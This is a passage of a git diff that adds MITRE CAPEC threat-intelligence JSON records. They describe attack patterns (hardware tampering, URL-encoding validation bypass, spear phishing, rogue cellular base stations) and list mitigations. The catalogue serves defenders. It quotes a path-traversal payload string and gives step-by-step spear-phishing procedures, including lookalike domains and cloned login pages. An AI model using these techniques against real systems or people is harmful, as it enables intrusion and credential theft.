"bundle--04f3ef70-912f-4828-9e13-6f022c08f84d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json new file mode 100644 index 0000000000000000000000000000000000000000..6b306429cd5f07078b96c3ccf23bbf1f63bb1946 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json @@ -0,0 +1,155 @@ +{ + "id": "bundle--1284e7b5-f405-4eac-91ab-45171465e879", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json new file mode 100644 index 0000000000000000000000000000000000000000..cd430c4354c8e745e498e5d65653e8e4a989beea --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json @@ -0,0 +1,123 @@ +{ + "id": "bundle--e779cea7-a257-4b9a-9385-60d3d46dfc4d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "external_id": "CAPEC-163", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Internal Spearfishing", + "external_id": "T1534", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1534" + }, + { + "description": "Phishing: Spearfishing Attachment", + "external_id": "T1566.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/001" + }, + { + "description": "Phishing: Spearfishing Link", + "external_id": "T1566.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/002" + }, + { + "description": "Phishing: Spearfishing via Service", + "external_id": "T1566.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/003" + }, + { + "description": "Phishing for Information: Spearfishing Service", + "external_id": "T1598.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/001" + }, + { + "description": "Phishing for Information: Spearfishing Attachment", + "external_id": "T1598.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/002" + }, + { + "description": "Phishing for Information: Spearfishing Link", + "external_id": "T1598.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/003" + } + ], + "id": "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Spear Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Accountability": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authentication": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authorization": [ + "Gain Privileges (Privilege Escalation)" + ], + "Confidentiality": [ + "Read Data (Information Leakage)" + ], + "Integrity": [ + "Modify Data (Data Modification)" + ], + "Non-Repudiation": [ + "Gain Privileges (Privilege Escalation)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target's online banking information which can now be used by them to log into the target's bank account and transfer money to a bank account of the adversary's choice.", + "An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer's IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain useful contextual detailed information about the targeted user or organization: An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.

    2. Techniques
    Conduct web searching research of target. See also: CAPEC-118.
    Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.
    Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.
    Collect social information via dumpster diving. See also: CAPEC-406.
    Collect social information via traditional sources. See also: CAPEC-118.
    Collect social information via Non-traditional sources. See also: CAPEC-118.

Experiment

  1. Optional: Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Optional: Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look at feel, but contain completely new content.

  3. Optional: Build variants of the website with very specific user information e.g., living area, etc.: Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.

    4. Techniques
    Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.

Exploit

  1. Convince user to enter sensitive information on adversary's site.: An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.

  2. Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

    3. Techniques
    Log in to the legitimate site using another user's supplied credentials.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "None. Any user can be targeted by a Spear Phishing attack." + ], + "x_capec_resources_required": [ + "An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into." + ], + "x_capec_skills_required": { + "Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json new file mode 100644 index 0000000000000000000000000000000000000000..72b22270a2d6ed061bcc019c4a3b1995724ed864 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--cb01b858-6f27-4b56-8861-332768ef1f53", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json new file mode 100644 index 0000000000000000000000000000000000000000..d0989ef3315c8210ee6ad6d160ac4173d90a2170 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7c8098cc-f797-447f-ae51-e45a0be1f42d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json new file mode 100644 index 0000000000000000000000000000000000000000..8b06b986ed195c23aaefa1727c380e5f21c29254 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d9a984dc-c196-4560-8405-64f1b6fc101f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json new file mode 100644 index 0000000000000000000000000000000000000000..eefbdceac22f00c5c4905ba4d637e0d87e6df631 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--df970e81-5a30-432a-8646-978f6579c7cb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json new file mode 100644 index 0000000000000000000000000000000000000000..ce843fbd052f49b74071cbc0f6af1e405ae18e8c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3cb7449a-a5f6-4844-9b38-165123de5348", + "objects": [ + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json new file mode 100644 index 0000000000000000000000000000000000000000..d41307f310f34c32406130d0f3d28529d6661831 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--33cb3a87-2187-43e9-bae7-7c0168aaf616", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json new file mode 100644 index 0000000000000000000000000000000000000000..2d1768d5177732820daeeda72915cf6443061f60 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5f0b8f8f-5e2e-4228-936a-ff8830600b1f", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json new file mode 100644 index 0000000000000000000000000000000000000000..f767333385ff8c7324761a54e3a8445106cd7450 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--815f5043-3812-4e34-86dd-8cb362c94f14", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json new file mode 100644 index 0000000000000000000000000000000000000000..a20e5d19e11d4c16775f4f57f6e261e20d5fba82 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d9dc7b17-75fb-4765-a81b-6ee2c193db64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json new file mode 100644 index 0000000000000000000000000000000000000000..2948fa5db10894f5175cbe631ccfbd6e68ef5d8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--69ddbada-add2-478d-a971-fa6d67c5d412", + "objects": [ + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json new file mode 100644 index 0000000000000000000000000000000000000000..ea49a817d973f4944df6b2c67e927f66d94ae90a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d25fae51-b533-4d38-aed6-30e6ffdc116a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 